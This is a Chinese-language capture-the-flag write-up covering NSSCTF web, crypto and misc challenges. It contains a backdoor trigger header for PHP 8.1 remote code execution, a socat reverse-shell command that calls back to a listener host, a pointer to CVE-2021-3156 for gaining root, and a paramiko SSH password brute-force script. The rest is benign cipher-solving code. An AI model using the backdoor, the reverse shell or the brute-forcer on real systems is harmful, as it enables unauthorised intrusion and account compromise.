Web
Becomeroot
首先是个php8.1的后门zerodium
在请求头里加上User-Agentt: zerodium{cmd}
可以实现RCE。
直接弹shell。弹shell之后使用socat增加tty。
# listener (callback) host: waits on 4444 and attaches the local tty
socat file:`tty`,raw,echo=0 tcp-listen:4444
# target host: connects back with an interactive bash on a pty
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:4444
然后用CVE-2021-3156
拿root权限即可。
Crypto
过年来下棋
棋盘密码
类型:ADFGVX,密码 lucky。
年画
首先可以发现 enc_c 是用 NSSCTF{ ^ key 得到的,所以 key 可以直接拿到。然后反过来写一个解密即可。
from PIL import Image
from Crypto.Cipher import AES
from Crypto.Util.Padding import *
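# enc_c is the AES key XOR-ed with the known flag prefix "NSSCTF{", so the
# key is recovered by XOR-ing that prefix back.  The \x1e and \x02 escapes
# must be single bytes: AES.new() only accepts a 16/24/32-byte key, and the
# doubled-backslash form would make this 22 bytes.
enc_c = b'&2#3-(\x1e9*6"&$\x02=&'
flag = b"NSSCTF{"


def _recover_key(ciphertext: bytes, known: bytes) -> bytes:
    """Undo a repeating-key XOR: ``ciphertext[i] ^ known[i % len(known)]``.

    Args:
        ciphertext: the XOR-masked key material (``enc_c``).
        known: the known plaintext it was masked with (the flag prefix).

    Returns:
        Bytes of the same length as ``ciphertext``; empty input gives ``b""``.

    Raises:
        ValueError: if ``known`` is empty, since there is nothing to cycle.
    """
    if not known:
        raise ValueError("known plaintext must not be empty")
    return bytes(c ^ known[i % len(known)] for i, c in enumerate(ciphertext))


key = _recover_key(enc_c, flag)
print("[+] Got key: ", key)

# Only the dimensions of the reference image are needed; close it right away.
with Image.open("random_image.png") as ref:
    w, h = ref.size
print(f"[+] Image size: {w}x{h}")

# cipher.txt is one long bit string; the real newlines have to go before
# int(..., 2) sees the data (a literal backslash-n would leave them in).
with open("cipher.txt") as fh:
    bin_data = fh.read().replace("\n", "")
# 8 bits -> one channel value, 3 values -> one RGB pixel
bin_data = [int(bin_data[i:i + 8], 2) for i in range(0, len(bin_data), 8)]
pixel_data = [bin_data[i:i + 3] for i in range(0, len(bin_data), 3)]
print(f"[+] Binary data pixels: {len(pixel_data)}")

print("[+] Recover Pixels with RGB to cipher.png")
img = Image.new("RGB", (w, h))
pixels = img.load()
# The flat pixel list is laid out column by column: index x*h + y.
for x in range(w):
    for y in range(h):
        pixels[x, y] = tuple(pixel_data[x * h + y])

print("[+] Recover cipher.png with key and save to flag.png")
pixels = img.tobytes()
# ECB, no padding: the w*h*3-byte pixel buffer is decrypted in place and
# written back as an image of the same size, so no unpad step is applied.
# Fail with a clear message instead of a cryptic one from decrypt() if the
# buffer is not block-aligned.
if len(pixels) % AES.block_size:
    raise ValueError(
        f"pixel buffer of {len(pixels)} bytes is not a multiple of {AES.block_size}"
    )
cipher = AES.new(key, AES.MODE_ECB)
dec_pixels = cipher.decrypt(pixels)
dec_img = Image.frombytes(img.mode, img.size, dec_pixels)
dec_img.save("flag.png")
print("[+] Done! Check flag.png for the flag!")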
Misc
温馨的酒吧
成分复杂的一道题()
反正整个交互树都看一遍就有了。
Number 7
cisco设备上的type7加密。
奇奇怪怪的原因最后两位解密不了。后来看了下发现最后两位直接是明文。
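from binascii import unhexlify

# Cisco "type 7" passwords are a reversible XOR against a fixed, public
# constant -- obfuscation rather than encryption -- which is why the
# original value can be recovered.  The first two characters are dropped
# and the remainder decoded from hex, exactly as in the original solve.
r = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"
r = unhexlify(r[2:])
key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
print("[+] Cipher: ", r)


def _type7_xor(data: bytes, salt: int, key: bytes) -> bytes:
    """XOR ``data`` against ``key`` cycled from offset ``salt``.

    Args:
        data: bytes to decode.
        salt: starting offset into ``key`` (taken modulo ``len(key)``).
        key: the repeating key; must be non-empty.

    Returns:
        Bytes of the same length as ``data``; empty ``data`` gives ``b""``.
    """
    return bytes(b ^ key[(i + salt) % len(key)] for i, b in enumerate(data))


# The last two bytes were found to be plaintext already (see the write-up
# above), so only r[:-2] is decoded and the tail is appended untouched.
# The key offset is unknown here, so every start position is tried; the
# loop stops at the first candidate containing the flag prefix.
for salt in range(len(key)):
    f = _type7_xor(r[:-2], salt, key) + r[-2:]
    if b"NSSCTF" in f:
        print("[+] Found salt: ", salt)
        print("[+] Decrypted: ", f)
        break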
usersssssssss和revenge
其实是同一个题,后面一个把wordlist加长了,flag放在.flag.txt下。(直接ls是看不到的)
直接用 paramiko 库写了脚本。
import paramiko
import hashlib
import logging
# paramiko's own DEBUG logging is switched on so each connection attempt
# and its failure reason are visible while the loop runs.
logging.getLogger("paramiko").setLevel(logging.DEBUG)
client = paramiko.SSHClient()
# AutoAddPolicy stores whatever host key the server presents, so the
# connection is not checked against a previously known key.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Challenge convention (see the write-up): password == md5(username).
# NOTE(review): the separator here is the two characters backslash + n as
# rendered on this page; a real newline ("\n") is presumably what was run -- confirm.
users = open("wl.txt").read().split("\\n")
passs = [hashlib.md5(user.encode()).hexdigest() for user in users]
for user, passw in zip(users, passs):
    try:
        client.connect("node2.anna.nssctf.cn",28808,username=user,password=passw)
        # the flag file is dot-prefixed (.flag.txt), hence `ls -a`
        stdin, stdout, stderr = client.exec_command("ls -a")
        r = stdout.read().decode().split("\\n")
        flag = [i for i in r if "flag" in i]
        print(f"[*] {user} {passw} run ls with output {r}")
        if flag != []:
            print(f"[+] Found flag in user {user} with password {passw}!")
            stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}")
            print(f"[+] Flag: {stdout.read().decode()}")
            break
    except Exception as e:
        # best-effort: a failed login is reported and the next user is tried
        print(f"[-] Failed with user {user} and password {passw}: {e}")
        pass
    finally:
        # close after every attempt so the next connect() starts from a
        # clean client; also runs on the break path above
        client.close()